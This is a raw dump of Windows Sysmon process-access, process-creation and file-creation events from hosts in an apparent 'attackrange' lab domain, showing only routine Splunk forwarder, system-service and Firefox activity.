07:44:50.178{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:50.178{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.178{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F2F2-60EB-F07C-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.178{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2F2-60EB-F07C-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.179{466BC892-F2F2-60EB-F07C-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806206Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:51.844{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56F2E34DB5325F8C525DA93F028B940F,SHA256=71C3C88AA33F27EDB3348DAC17861766F43B07BE7ED1DCE12BE1595733970C41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:51.893{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D2F4A4F2E882B76C51B4AF49E12BB40,SHA256=6EC0A6CA18AE60BC968F20DEFF1AAA102B7C6A16D55F1DF611E769AE62B80997,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.762{466BC892-F2F3-60EB-F27C-00000000CF01}16165516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.539{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2F3-60EB-F27C-00000000CF01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:51.539{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.539{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:51.539{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.539{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.539{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F2F3-60EB-F27C-00000000CF01}1616C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.539{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2F3-60EB-F27C-00000000CF01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.524{466BC892-F2F3-60EB-F27C-00000000CF01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.224{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0154156110DF4FDE220E8189267E7D7E,SHA256=774611E52C2093D3F3B317BD24633E332D1B7EEFDD8CBE00BCCE2EADAE1AC586,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806207Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:52.844{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBCB31A0BFC08DD4433B3049F683FD36,SHA256=22DDCCE759D020A8FD18F3C8F55B1063371FA97F24755857E991275709B78CE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.939{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7CC0BED66E5CE94869B3BF183C7D7154,SHA256=F772E409BF98F2EA72E1FA6BB7E10E7F81808EE87EA9784BA21B882533481481,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:52.939{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C1E7FA8A01BF47C458B284524729021A,SHA256=55103CCAB1EF2BE5AFBB1B571ACD9FD7EBD5BB27489CB4BAA02ED868AD5EC243,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CF95448B20677C31CB50791B6C85FDE1,SHA256=B8711BF73122F6948B589DBF3080625909B0B2135988175232D6E1F341B397CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A60B05F15A1B6351C95A38D9AFF2D911,SHA256=4BF692EBEE26B5B357941B814B0494FFA71AD5B227999CF1E99E5845B1BEF3CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=584A77D2639841CCACC09C35E39D8AB2,SHA256=B72DCA7CC3DE676271911B7183D89C8CD9E035930732DF7256CA496B265476D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=17AC8551F007758C5CF8E818FB5E8687,SHA256=C2B62B3DD6764497D5D4DCDA9171BE34B1F215B7314591C015CC58DF60B06B76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D474F9325FC4A137D26A11F296AEF2E,SHA256=1F1E15EDA6F88EAFC0DF828D1DC1C8D4872A00F23E85868C750D23737F208A41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=052FC0DD94EA7C6D6EA32398D83B9607,SHA256=524DB6EB8009D1B66E53C27AF7C2446E58E17CD1E0C92EEA14E306C01B01267A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=54BB465867E2C818AF5473633E84F4B0,SHA256=67B8E8FAC23A34ABB30DE94279CF93D6905532D2FE0F45161671C6E9AD470BE0,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001046143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1090195F3B89EB0F49D9C560B06EEA18,SHA256=FCD670367CA6225CD415B5FE8F6E4F1BD6F395FF73885EAB11AAFC8A35856885,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D2B4437A625B6F62A9F5B2DFC692D43A,SHA256=75DDAEB182556202C33FF89480E15352525B012141B956C408AFEF2E92006F5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=AF1671290254A5FAFF105D990E817918,SHA256=B8D8AD6304CE81B86B0D8D65405EDD05572DF757B498E965194871570957EEC3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.892{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2F4-60EB-F47C-00000000CF01}7976C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.892{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:52.892{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.892{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:52.877{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.877{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F2F4-60EB-F47C-00000000CF01}7976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 